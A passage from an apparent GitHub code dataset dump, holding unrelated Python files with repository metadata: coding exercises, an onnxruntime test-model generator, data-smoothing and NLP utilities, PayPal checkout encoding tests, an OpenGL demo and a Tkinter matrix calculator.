\n\nif __name__ == '__main__':\n s = input()\n alnum = False\n alpha = False\n digit = False\n lower = False\n upper = False\n for i in range(len(s)):\n if s[i].isalnum() and not alnum:\n alnum = True\n if s[i].isalpha() and not alpha:\n alpha = True\n if s[i].isdigit() and not digit:\n digit = True\n if s[i].islower() and not lower:\n lower = True\n if s[i].isupper() and not upper:\n upper = True\n print(alnum)\n print(alpha)\n print(digit)\n print(lower)\n print(upper)","repo_name":"mghadieh/python","sub_path":"HackerRank/11_StringValidators.py","file_name":"11_StringValidators.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21103478154","text":"import os\n\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.external_data_helper import set_external_data\nfrom onnx.numpy_helper import from_array\n\n\ndef create_external_data_tensor(value, tensor_name): # type: (List[Any], Text) -> TensorProto\n tensor = from_array(np.array(value))\n tensor.name = tensor_name\n tensor_filename = f\"{tensor_name}.bin\"\n set_external_data(tensor, location=tensor_filename)\n\n with open(os.path.join(tensor_filename), \"wb\") as data_file:\n data_file.write(tensor.raw_data)\n tensor.ClearField(\"raw_data\")\n tensor.data_location = onnx.TensorProto.EXTERNAL\n return tensor\n\n\ndef GenerateModel(model_name, external_data_name): # noqa: N802\n # Create one input (ValueInfoProto)\n X = helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, [1, 2]) # noqa: N806\n\n # Create second input (ValueInfoProto)\n Pads = helper.make_tensor_value_info(external_data_name, TensorProto.INT64, [4]) # noqa: N806\n\n # Create one output (ValueInfoProto)\n Y = helper.make_tensor_value_info(\"Y\", TensorProto.FLOAT, [1, 4]) # noqa: N806\n\n # Create a node (NodeProto)\n node_def = helper.make_node(\n \"Pad\", # node name\n [\"X\", external_data_name], # inputs\n [\"Y\"], # outputs\n mode=\"constant\", # Attributes\n )\n\n # Create the graph (GraphProto)\n graph_def = helper.make_graph(\n [node_def],\n \"test-model\",\n [X, Pads],\n [Y],\n [\n create_external_data_tensor(\n [\n 0,\n 0,\n 1,\n 1,\n ],\n external_data_name,\n )\n ],\n )\n\n # Create the model (ModelProto)\n model_def = helper.make_model(graph_def, producer_name=\"onnx-example\")\n\n print(f\"The ir_version in model: {model_def.ir_version}\\n\")\n print(f\"The producer_name in model: {model_def.producer_name}\\n\")\n print(f\"The graph in model:\\n{model_def.graph}\")\n onnx.checker.check_model(model_def)\n print(\"The model is checked!\")\n with open(model_name, \"wb\") as model_file:\n model_file.write(model_def.SerializeToString())\n\n\nif __name__ == \"__main__\":\n GenerateModel(\"model_with_external_initializers.onnx\", \"Pads\")\n GenerateModel(\"model_with_orig_ext_data.onnx\", \"model_with_orig_ext_data\")\n","repo_name":"microsoft/onnxruntime","sub_path":"onnxruntime/test/testdata/model_with_external_initializers.py","file_name":"model_with_external_initializers.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":9700,"dataset":"github-code","pt":"18"} +{"seq_id":"35707114242","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 18 10:41:35 2018\n\n对正规化后的传感器监测数据平滑\n\n@author: maliang\n\"\"\"\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.api as sm\nfrom matplotlib import pyplot as plt\n\ndef smooth(seq, frac):\n lowess = 
sm.nonparametric.lowess\n x = list(range(len(seq)))\n seq_smoothed = lowess(seq, x, frac=frac, return_sorted=False)\n return seq_smoothed\n\nengine_list = [str(i + 1) for i in range(218)] # All engines\nsensor_list = ['s2', 's3', 's4', 's7', 's8', 's9', 's11', 's12',\n 's13', 's14', 's15', 's17', 's20', 's21'] # All sensitive sensors\n\n\n# create folders to save the smoothed figures\nfigure_path = 'figures/smooth/'\nfor sensor_name in sensor_list:\n if not os.path.exists(figure_path+sensor_name+'/'):\n os.makedirs(figure_path+sensor_name+'/')\n \n \ndata_path = 'data_with_engine_ID/'\nfor engine_ID in engine_list:\n df_original = pd.read_csv(data_path+engine_ID+'_transformed.csv', index_col=0)\n df_smooth = pd.DataFrame()\n for icol in range(df_original.shape[1]):\n col_name = df_original.columns[icol]\n if col_name in sensor_list:\n # smooth, save\n seq_raw = np.array(df_original[col_name])\n seq_smoothed = smooth(seq_raw, frac=0.05)\n \n # plot to observe, can be commented out\n plt.plot(seq_raw, label='original')\n plt.plot(seq_smoothed, label='smooth')\n plt.legend()\n plt.title('Engine #'+engine_ID+', '+col_name)\n plt.savefig(figure_path+col_name+'/'+engine_ID+'.jpg', dpi=200)\n plt.clf()\n plt.close()\n \n # add to df_smooth\n df_smooth[col_name] = seq_smoothed\n else:\n # directly save\n df_smooth[col_name] = df_original[col_name]\n df_smooth.to_csv(data_path+engine_ID+'_smooth.csv')\n \n \n \n \n \n\n\n\n\n","repo_name":"mal96/PHM","sub_path":"Bachelor-Thesis/LSTM_RUL_estimation_PHM08/2_smooth.py","file_name":"2_smooth.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"18275489128","text":"import csv\nfrom itertools import chain\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\"\"\"\nTASK 4:\nThe telephone company wants to identify numbers that might be doing\ntelephone marketing. 
Create a set of possible telemarketers:\nthese are numbers that make outgoing calls but never send texts,\nreceive texts or receive incoming calls.\n\nPrint a message:\n\"These numbers could be telemarketers: \"\n\nThe list of numbers should be printed out one per line in lexicographic order with no duplicates.\n\"\"\"\n\ntelephone_numbers_in_texts = list(chain.from_iterable(\n [(sender, receiver) for sender, receiver, _ in texts]))\n\ntexters = set(telephone_numbers_in_texts)\n\ncallers = set()\ncall_receivers = set()\n\nfor caller, receiver, _, _ in calls:\n callers.add(caller)\n call_receivers.add(receiver)\n\n# telemarketers don't send or receive texts, and don't receive calls\npossible_telemarketers = callers - (texters | call_receivers)\n\nprint(\"These numbers could be telemarketers:\")\n\nfor tel_number in sorted(possible_telemarketers):\n print(tel_number)\n","repo_name":"thepembeweb/unscramble-computer-science-problems","sub_path":"Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"37301649234","text":"from collections import Counter\n\ndef gcd(a, b):\n while b:\n a, b = b, a % b\n return a\n\ndef slope(a, b):\n mul = gcd(abs(a), abs(b))\n if mul != 0:\n a, b = a // mul, b // mul\n if b < 0:\n a *= -1\n b *= -1\n return (a, b)\n\nn = int(input())\n\narr = list(map(int, input().split()))\n\nvalid = set()\n\nfor i in range(1, n + 1):\n valid.add(i * (i - 1) // 2)\n\npos = False\n\nfor i in range(1, n):\n m = slope(arr[i] - arr[0], i)\n diffs = set()\n diffslope = -1\n for j in range(1, n):\n curr = slope(arr[j] - arr[0], j)\n if curr != m:\n diffslope = j\n break\n if diffslope != -1:\n for j in range(1, n):\n if j == diffslope:\n continue\n curr = slope(arr[j] - arr[0], j)\n if curr != m:\n diffs.add(slope(arr[j] - arr[diffslope], j - diffslope))\n else:\n break\n if len(diffs) == 0 or (len(diffs) == 1 and m in diffs):\n pos = True\n break\n\nslopes = set()\n\nfor i in range(2, n):\n slopes.add(slope(arr[i] - arr[1], i - 1))\n\nif slope(arr[1] - arr[0], 1) in slopes:\n slopes.remove(slope(arr[1] - arr[0], 1))\n\nif len(slopes) == 1:\n pos = True\n\nprint(\"Yes\" if pos else \"No\")","repo_name":"theabbie/leetcode","sub_path":"miscellaneous/B_Tell_Your_World.py","file_name":"B_Tell_Your_World.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"74806373481","text":"import os\n\nimport numpy as np\nimport pickle as pckl\n\nfrom nltk.corpus import wordnet\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\n\nporter = PorterStemmer()\nwnl = WordNetLemmatizer()\n\ndef process_line(sentence, tokenizer=word_tokenize):\n lemmas = []\n\n for idx, word in enumerate(tokenizer(sentence)):\n lemmas.append(lemmatize(word.lower()))\n\n lemmas = [lemma for lemma in lemmas if lemma.isalpha()]\n return lemmas\n\ndef lemmatize(word, lemmatizer=wnl, stemmer=porter):\n lemma = lemmatizer.lemmatize(word)\n stem = stemmer.stem(word)\n\n if not wordnet.synsets(lemma):\n if not wordnet.synsets(stem):\n return word\n else:\n return stem\n else:\n return lemma\n\ndef generate_vocab(filenames, write_filename='./data/embeddings/vocab.txt'):\n vocabulary = []\n for filename in filenames:\n with open(filename) as data_file:\n lines = [line.split('\\t') for line in data_file.read().splitlines()]\n \n for line in lines:\n words = process_line(line[1])\n 
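            # Testing membership in a list rescans `vocabulary` for every
            # word, which makes the build quadratic; accumulating into a set
            # and sorting once at the end would produce the same vocab file.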
vocabulary += [word for word in words if word not in vocabulary]\n \n vocabulary.sort()\n\n with open(write_filename, 'w') as write_file:\n for word in vocabulary:\n write_file.write(\"%s\\n\" % word)\n return\n\ndef map_to_vocab(sentence, vocab_dict='./data/dumps/vocab.pckl'):\n with open(vocab_dict, 'rb') as vfile:\n v_dict = pckl.load(vfile)\n \n return [v_dict.get(word, 0) for word in sentence]\n\ndef zero_pad(sequence, max_len=600):\n # sequence length is approx. equal to\n # the max length of sequence in train set \n return np.pad(sequence, (0, max_len - len(sequence)), mode='constant') \\\n if len(sequence) < max_len else np.array(sequence[:max_len])\n\nclass Process(object):\n def __init__(self, line):\n self.tokens = process_line(line[1])\n \n self.target = np.zeros(len(self.tokens))\n target_words = process_line(line[4])\n for idx,_ in enumerate(self.tokens):\n if self.tokens[idx] in target_words:\n self.target[idx] = 1\n\n self.tokens = zero_pad(map_to_vocab(self.tokens))\n self.target = zero_pad(map_to_vocab(self.target))\n \n self.label = [float(line[9]), float(line[10])]\n\n\nclass DataLoader(object):\n def __init__(self):\n self.data = [] \n\n def load(self, filename):\n with open(filename) as data_file:\n lines = [line.split('\\t') for line in data_file.read().splitlines()]\n \n for line in lines:\n self.data.append(Process(line))\n \n _x = np.array([data.tokens for data in self.data])\n _x_map = np.array([data.target for data in self.data])\n \n _y = np.array([data.label[0] for data in self.data])\n _y_prob = np.array([data.label[1] for data in self.data])\n \n return _x, _x_map, _y, _y_prob\n\ndef fetch(filename):\n \"\"\"\n Fetch the preprocessed data from dump\n \"\"\"\n x, x_map, y, y_prob = pckl.load(open(filename, mode=\"rb\"))\n return x, x_map, y, y_prob\n\n\ndef create_dump(filename, write_filename):\n loader = DataLoader()\n x, x_map, y, y_prob = loader.load(filename)\n pckl.dump((x, x_map, y, y_prob), open(write_filename, \"wb\"))\n return\n\ndef load_embeddings(path, size, dimensions):\n \n embedding_matrix = np.zeros((size, dimensions), dtype=np.float32)\n\n size = os.stat(path).st_size\n with open(path, 'rb') as ifile:\n pos = 0\n idx = 0\n while pos < size:\n chunk = np.load(ifile)\n chunk_size = chunk.shape[0]\n embedding_matrix[idx:idx + chunk_size, :] = chunk\n idx += chunk_size\n pos = ifile.tell()\n return embedding_matrix\n\ndef batch_iter(data, batch_size, n_epochs, shuffle=False):\n print (\"Generating batch iterator ...\")\n data = np.array(data)\n data_size = len(data)\n n_batches_per_epoch = int((data_size - 1) / batch_size) + 1\n \n for epoch in range(n_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n \n for batch_num in range(n_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]","repo_name":"aayux/quinn","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"72107525219","text":"\"\"\"\nTests for encoding Express Checkout API objects to NVP.\n\"\"\"\nimport decimal\n\nfrom twisted.trial import unittest\n\nfrom txievery.expresscheckout import api\nfrom txievery.expresscheckout.encode import encodePaymentRequests, 
_encodeItem\n\n\nCHEAP_ITEM = api.Item(\"Cake\", \"100.00\")\nEXPENSIVE_ITEM = api.Item(\"Diamond\", \"100000.00\")\n\n\ndef categories(itemDetails):\n return [item.category for item, qty in itemDetails]\n\n\n\nclass RequestEncodingTest(unittest.TestCase):\n items = [CHEAP_ITEM, EXPENSIVE_ITEM]\n\n def setUp(self):\n itemDetails = [(self.items[0], 1)]\n self.singleItemRequest = api.PaymentRequest(itemDetails)\n self.singleItemRequest.categories = categories(itemDetails)\n\n itemDetails = [(self.items[0], 2), (self.items[1], 3)]\n self.multipleItemRequest = api.PaymentRequest(itemDetails)\n self.multipleItemRequest.categories = categories(itemDetails)\n\n\n def test_oneItem(self):\n \"\"\"\n Tests a single payment request with a single item.\n \"\"\"\n request = self.singleItemRequest\n encoded = encodePaymentRequests(request)\n categories = request.categories\n expected = [('PAYMENTREQUEST_0_PAYMENTACTION', 'Sale'),\n ('PAYMENTREQUEST_0_AMT', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_QTY0', 1),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', categories[0]),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake')]\n self.assertEqual(list(encoded), expected)\n\n\n def test_manyItems(self):\n \"\"\"\n Tests a single payment request with more than one item.\n \"\"\"\n request = self.multipleItemRequest\n encoded = encodePaymentRequests(request)\n categories = request.categories\n expected = [('PAYMENTREQUEST_0_PAYMENTACTION', 'Sale'),\n ('PAYMENTREQUEST_0_AMT', decimal.Decimal('300200.00')),\n ('L_PAYMENTREQUEST_0_QTY0', 2),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', categories[0]),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake'),\n ('L_PAYMENTREQUEST_0_QTY1', 3),\n ('L_PAYMENTREQUEST_0_AMT1', decimal.Decimal('100000.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY1', categories[1]),\n ('L_PAYMENTREQUEST_0_NAME1', 'Diamond'),]\n self.assertEqual(list(encoded), expected)\n\n\n def test_several(self):\n \"\"\"\n Test several payment requests with variable amounts of items.\n \"\"\"\n requests = self.singleItemRequest, self.multipleItemRequest\n encoded = encodePaymentRequests(*requests)\n categories = [r.categories for r in requests]\n expected = [('PAYMENTREQUEST_0_PAYMENTACTION', 'Sale'),\n ('PAYMENTREQUEST_0_AMT', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_QTY0', 1),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', categories[0][0]),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake'),\n ('PAYMENTREQUEST_1_PAYMENTACTION', 'Sale'),\n ('PAYMENTREQUEST_1_AMT', decimal.Decimal('300200.00')),\n ('L_PAYMENTREQUEST_1_QTY0', 2),\n ('L_PAYMENTREQUEST_1_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_1_ITEMCATEGORY0', categories[1][0]),\n ('L_PAYMENTREQUEST_1_NAME0', 'Cake'),\n ('L_PAYMENTREQUEST_1_QTY1', 3),\n ('L_PAYMENTREQUEST_1_AMT1', decimal.Decimal('100000.00')),\n ('L_PAYMENTREQUEST_1_ITEMCATEGORY1', categories[1][1]),\n ('L_PAYMENTREQUEST_1_NAME1', 'Diamond')]\n self.assertEqual(list(encoded), expected)\n\n\n \nclass ItemEncodingTest(unittest.TestCase):\n items = [CHEAP_ITEM, EXPENSIVE_ITEM]\n\n def _testEncode(self, index, item, qty, expected):\n encoded = _encodeItem(\"PAYMENTREQUEST_0_{0}\", index, item, qty)\n self.assertEqual(list(encoded), expected)\n\n \n def test_one(self):\n \"\"\"\n Tests encoding a single item.\n \"\"\"\n expectedCategory = self.items[0].category\n expected = [('L_PAYMENTREQUEST_0_QTY0', 1),\n ('L_PAYMENTREQUEST_0_AMT0', 
decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', expectedCategory),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake')]\n self._testEncode(0, self.items[0], 1, expected)\n\n\n def test_many(self):\n \"\"\"\n Tests encoding a single item with a quantity larger than 1.\n \"\"\"\n expectedCategory = self.items[0].category\n expected = [('L_PAYMENTREQUEST_0_QTY0', 10),\n ('L_PAYMENTREQUEST_0_AMT0', decimal.Decimal('100.00')),\n ('L_PAYMENTREQUEST_0_ITEMCATEGORY0', expectedCategory),\n ('L_PAYMENTREQUEST_0_NAME0', 'Cake')]\n self._testEncode(0, self.items[0], 10, expected)","repo_name":"lvh/txievery","sub_path":"txievery/expresscheckout/test/test_encode.py","file_name":"test_encode.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"29553341434","text":"from wxpy3d import Window\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom rtmodel import mesh\nfrom rtmodel import camera\nfrom wxpy3d.opengl_state import opengl_state\n\nif not 'window' in globals():\n #window = CameraWindow(size=(1920,1080))\n window = Window(size=(1024,768))\n glutInit()\n window.ShowFullScreen(True)\n\n\ndef load_obj(name='gamecube'):\n global obj\n\n window.canvas.SetCurrent()\n obj = mesh.load(name)\n obj.RT = np.eye(4, dtype='f')\n obj.RT[:3,3] = -obj.vertices[:,:3].mean(0)\n\n window.lookat = obj.RT[:3,3] + obj.vertices[:,:3].mean(0)\n window.Refresh()\n\n\n@window.eventx\ndef EVT_CHAR(evt):\n key = evt.GetKeyCode()\n if key == ord('f'):\n window.ShowFullScreen(not window.IsFullScreen())\n if key == ord(' '):\n pass\n\n\n# Animation\nif not 'is_animating' in globals():\n is_animating = False\n\ndef resume():\n global is_animating\n is_animating = True\n\ndef stop():\n global is_animating\n is_animating = False\n\nanim_angle = 0.0\n@window.eventx\ndef EVT_IDLE(evt):\n global anim_angle\n if is_animating:\n anim_angle += 0.005\n window.Refresh()\n\n# Render the mesh before drawing points\n@window.event\ndef on_draw():\n\n camera = None\n\n class NoDraw: draw = lambda _: None\n\n def render(mode):\n glDrawBuffer(dict(left=GL_BACK_LEFT,\n right=GL_BACK_RIGHT,\n center=GL_BACK)[mode])\n\n glClearColor(0,0,0,0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n proj_matrix, model_matrix = make_projection(camera, mode)\n glMatrixMode(GL_PROJECTION)\n glLoadMatrixf(proj_matrix.transpose())\n glMatrixMode(GL_MODELVIEW)\n glLoadMatrixf(model_matrix.transpose())\n\n with opengl_state(): \n draw_thing()\n \n if 1 and glGetInteger(GL_STEREO):\n render('left')\n render('right')\n else:\n render('center')\n\n\ndef draw_thing():\n\n global obj\n if not 'obj' in globals():\n load_obj()\n window.canvas.SetCurrent()\n window.Refresh()\n\n glLightfv(GL_LIGHT0, GL_POSITION, (-40, 200, 100, 0.0))\n glLightfv(GL_LIGHT0, GL_AMBIENT, (0.3, 0.3, 0.3, 0.0))\n glLightfv(GL_LIGHT0, GL_DIFFUSE, (0.3, 0.3, 0.3, 0.0))\n glEnable(GL_LIGHT0)\n glEnable(GL_LIGHTING)\n #glColorMaterial(GL_FRONT_AND_BACK, GL_AMBIENT_AND_DIFFUSE)\n glEnable(GL_COLOR_MATERIAL)\n glEnable(GL_DEPTH_TEST)\n glShadeModel(GL_SMOOTH)\n\n # glRotate for pitch down and rotation\n glRotate(-20*1, 1,0,0)\n glRotate(np.rad2deg(anim_angle), 0,1,0)\n glScale(-0.33,0.33,0.33)\n obj.draw()\n\n\ndef make_projection(camera, mode):\n assert mode in ('left','right','center')\n\n # Copy the matrix projection mode given camera parameters\n eyesep = 0.063 # Average adult eyes are 60mm apart\n width = 0.736 # Width of the projection image (m)\n focal_length = 1.5 # Distance to 
the projection image (m)\n ratio = 1920 / 1080. # Width / height\n #ratio = 1024 / 768. # Width / height\n\n far = 10\n near = 0.5 # Near plane is half meter in front of eyes\n tan_ap = 0.5 * width / focal_length\n wd2 = near * tan_ap\n ndfl = near / focal_length\n\n offsetx = dict(left=-1,right=1,center=0)[mode] * 0.5 * eyesep\n\n left = - ratio * wd2 + offsetx * ndfl\n right = ratio * wd2 + offsetx * ndfl\n top = wd2\n bottom = - wd2\n\n with opengl_state():\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glFrustum(left, right, bottom, top, near, far)\n projection = glGetFloatv(GL_PROJECTION_MATRIX).transpose()\n\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n glTranslate(offsetx,0,-focal_length)\n glRotate(180, 0,1,0)\n modelview = glGetFloatv(GL_MODELVIEW_MATRIX).transpose()\n\n return projection, modelview\n\n\nwindow.Refresh()\n","repo_name":"amiller/projective_stereo","sub_path":"demos/demo_objrender.py","file_name":"demo_objrender.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"72261150176","text":"from turtle import *\nfrom time import sleep\n\ndef draw_star(sides: int):\n alpha = 180/sides\n\n color('green', 'purple')\n begin_fill()\n sleep(3)\n\n for i in range(0, sides):\n forward(200)\n right(180 - alpha)\n end_fill()\n done()\n\nif __name__ == \"__main__\":\n draw_star(9)","repo_name":"hlfshell/rbe550","sub_path":"hw0/turtle-sim.py","file_name":"turtle-sim.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40002105778","text":"##programa hecho por Abdul Hamid Achik López\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom sympy import *\nimport DAO\nimport models\n\nmatrices = list()\ndiccionario = dict()\nroot = Tk()\nf = ttk.Frame(root, height=600, width=830)\nf.pack()\nroot.title(\"Pytrix\")\nroot.option_add('+tearOff', False)\nmenubar = Menu(f)\nroot.config(menu=menubar)\nfile = Menu(menubar)\nedit = Menu(menubar)\nhelp_ = Menu(menubar)\nmenubar.add_cascade(menu=file, label='Archivo')\nmenubar.add_cascade(menu=edit, label='Editar')\nmenubar.add_cascade(menu=help_, label='Ayuda')\nhelp_.add_command(label='Informacion', command=lambda: about())\nfile.add_command(label='Guardar',command = lambda:guardarFile(t.get(\"1.0\",END)))\ngBotones = ttk.LabelFrame(f, text=\"Menu \")\ngBotones.place(x=695, y=20)\ngText = ttk.LabelFrame(f, text=\"Texto\")\ngText.place(x=20, y=20)\ngLista = ttk.LabelFrame(f, text=\"Matrices Creadas\")\ngLista.place(x=695, y=230)\ngMenu = ttk.LabelFrame(f, text=\"Operaciones\")\ngMenu.place(x=695, y=310)\ntScrl = ttk.Scrollbar(gText)\ntScrl.grid(row=0,column=1,sticky='ns')\nt = Text(gText, height=33, width=78,yscrollcommand=tScrl.set)\nt.grid(row=0, column=0)\ntScrl.config(command=t.yview)\nbMult = ttk.Button(gMenu, text=\"x\", width=15, command=lambda: Multiplicacion(lstMatrices.get(lstMatrices.curselection())))\nbMult.pack(padx=5, pady=5)\nbSum = ttk.Button(gMenu, text=\"+\", width=15, command=lambda: Suma(lstMatrices.get(lstMatrices.curselection())))\nbSum.pack(padx=5, pady=5)\nbRes = ttk.Button(gMenu, text=\"-\", width=15, command=lambda: Resta(lstMatrices.get(lstMatrices.curselection())))\nbRes.pack(padx=5, pady=5)\nbInv = ttk.Button(gMenu, text=\"Inversa\", width=15, command=lambda: Inversa(lstMatrices.get(lstMatrices.curselection())))\nbInv.pack(padx=5, pady=5)\nbConst = ttk.Button(gMenu, text=\"x*A\",width=15, command=lambda: 
MultVar(lstMatrices.get(lstMatrices.curselection())))\nbConst.pack(padx=5, pady=5)\nbPot = ttk.Button(gMenu,text=\"A^x\",width=15)\nbPot.pack(padx=5, pady=5)\nbEuler = ttk.Button(gMenu, text=\"e^A\", width=15)\nbEuler.pack(padx=5, pady=5)\nbInit = ttk.Button(gBotones, text =\"Crear Matriz\", width=15, command=lambda: init())\nbInit.pack(padx=5, pady=5)\nbGauss = ttk.Button(gBotones, text=\"Gauss\", width=15, command=lambda: \\\n gauss(lstMatrices.get(lstMatrices.curselection())))\nbGauss.pack(padx=5, pady=5)\nbDeter = ttk.Button(gBotones, text=\"Determinante\", width=15, command=lambda: \\\n determinante(lstMatrices.get(lstMatrices.curselection())))\nbDeter.pack(padx=5, pady=5)\nbEigVals = ttk.Button(gBotones, text=\"Eigenvalores\",width=15, command=lambda: \\\n eigVal(lstMatrices.get(lstMatrices.curselection())))\nbEigVals.pack(padx=5, pady=5)\nbEigVects = ttk.Button(gBotones, text=\"Eigenvectores\",width=15, command=lambda: \\\n eigVect(lstMatrices.get(lstMatrices.curselection())))\nbEigVects.pack(padx=5, pady=5)\nscrlMatrices = ttk.Scrollbar(gLista)\nlstMatrices = Listbox(gLista, yscrollcommand=scrlMatrices, exportselection=0)\nlstMatrices.config(height=3, width=13)\nlstMatrices.grid(row=0, column=0)\nscrlMatrices.grid(row=0, column=1)\nscrlMatrices.config(command=lstMatrices.yview)\n\n\ndef init():\n fn = Toplevel()\n lbColumna = Label(fn, text=\"Columnas\", font=('Arial', 9))\n lbColumna.grid(row=0, column=0, padx=5, pady=10)\n lbFila = Label(fn, text=\"Filas\", font=('Arial', 9))\n lbFila.grid(row=0, column=1, padx=5, pady=10)\n entColumna = Entry(fn, textvariable=1, width=10)\n entColumna.grid(row=1, column=0, padx=5, pady=10)\n entFila = Entry(fn, textvariable=2, width=10)\n entFila.grid(row=1, column=1, padx=5, pady=10)\n\n btnCrear = Button(fn, text=\"Crear\", width=10, command=lambda: crearMatriz(int(Entry.get(entFila)),\n int(Entry.get(entColumna))))\n btnCrear.grid(row=2, column=1)\n\n def crearMatriz(fila, columna):\n entFila.delete(0, END)\n entColumna.delete(0, END)\n fn.destroy()\n fx = Toplevel()\n Svar = list()\n cmpLb = LabelFrame(fx, text=\"Matriz\")\n cmpLb.pack()\n cmpBt = LabelFrame(fx, text=\"Nombre de la matriz\")\n cmpBt.pack()\n\n for i in range(0, fila):\n b = list()\n \n for j in range(0, columna):\n b.insert(j, StringVar())\n entDt = Entry(cmpLb, textvariable=b[j], width=5)\n entDt.grid(row=i, column=j)\n\n Svar.insert(j, b)\n entNombre = Entry(cmpBt, textvariable=4, width=10)\n entNombre.grid(row=0, column=0)\n btn = Button(cmpBt, text=\"Aceptar\", command=lambda: Aceptar(Svar, Entry.get(entNombre)))\n btn.grid(row=0, column=1)\n\n def Aceptar(Svar, Nombre):\n entNombre.delete(0, END)\n for i in range(0, fila):\n\n for j in range(0, columna):\n \n Svar[i][j] = Svar[i][j].get()\n \n matrices.append(Svar)\n \n lstMatrices.insert(END, Nombre)\n diccionario[Nombre] = matrices[-1]\n \n fx.destroy()\n \n t.insert(END, \"Matriz creada exitosamente!\\n\\n\")\n\n\ndef mostrar(Matriz, Nombre):\n \n try:\n t.insert(END, (Nombre + \" = \\n\"))\n for i in range(0, len(Matriz)):\n t.insert(END, \"\\t\")\n t.insert(END, Matriz[i])\n t.insert(END, \"\\n\")\n except TypeError:\n t.insert(END, (Nombre + \"=\"))\n t.insert(END, \"\\t\")\n t.insert(END, Matriz)\n t.insert(END, \"\\n\")\n \n\ndef onSelect(evt):\n \n if lstMatrices.size() == 0:\n try:\n t.insert(END, \"no hay nada en la lista seleccionado\\n\")\n except Exception:\n t.insert(END, \"hubo un Error \\n\")\n pass\n else:\n fn = Toplevel()\n lb = Label(fn, text=\"Mostrar matriz en pantalla\")\n lb.pack(padx=5, 
pady=5)\n btnSi = Button(fn, text=\"Si\", command=lambda: si())\n btnSi.pack(side=LEFT, padx=5, pady=5)\n btnNo = Button(fn, text=\"No\", command=lambda: no())\n btnNo.pack(side=RIGHT, padx=5, pady=5)\n\n def no():\n fn.destroy()\n fx = Toplevel()\n string = \"Matriz \" + lstMatrices.get(lstMatrices.curselection()) + \" seleccionada\"\n lb = Label(fx, text=string)\n lb.pack(padx=5, pady=5)\n btn = Button(fx, text=\"Ok\", command=lambda: fx.destroy())\n btn.pack(padx=5, pady=5)\n lstMatrices.get(lstMatrices.curselection())\n\n def si():\n mostrar(diccionario[lstMatrices.get(lstMatrices.curselection())],\n lstMatrices.get(lstMatrices.curselection()))\n fn.destroy()\n\nlstMatrices.bind('<>', onSelect)\n\n\ndef gauss(Nombre):\n fila = len(diccionario[Nombre])\n columna = len(diccionario[Nombre][0])\n if (fila + 1) == columna:\n \n t.insert(END, \"\\n\")\n m = Matrix(diccionario[Nombre])\n res = m.rref()\n t.insert(END, \"Resultado = \\n\")\n c = trans(res[0])\n nuevoNombre = \"ans(\" + Nombre + \")\"\n mostrar(c, Nombre)\n guardar(c, nuevoNombre)\n\n else:\n t.insert(END, \"La matriz fue resuelta pero no tiene un resultado util \\n\")\n\n\ndef determinante(Nombre):\n if len(diccionario[Nombre]) == len(diccionario[Nombre][0]):\n t.insert(END, \"\\n\")\n m = Matrix(diccionario[Nombre])\n res = m.det()\n nuevoNombre = \"det(\" + Nombre + \")\"\n guardar(res, nuevoNombre)\n \n t.insert(END, \"Determinante = \\t\")\n t.insert(END, res)\n t.insert(END, \"\\n\")\n else:\n t.insert(END, \"La matriz no es cuadrada \\n\")\n\n\ndef eigVal(Nombre):\n fila = 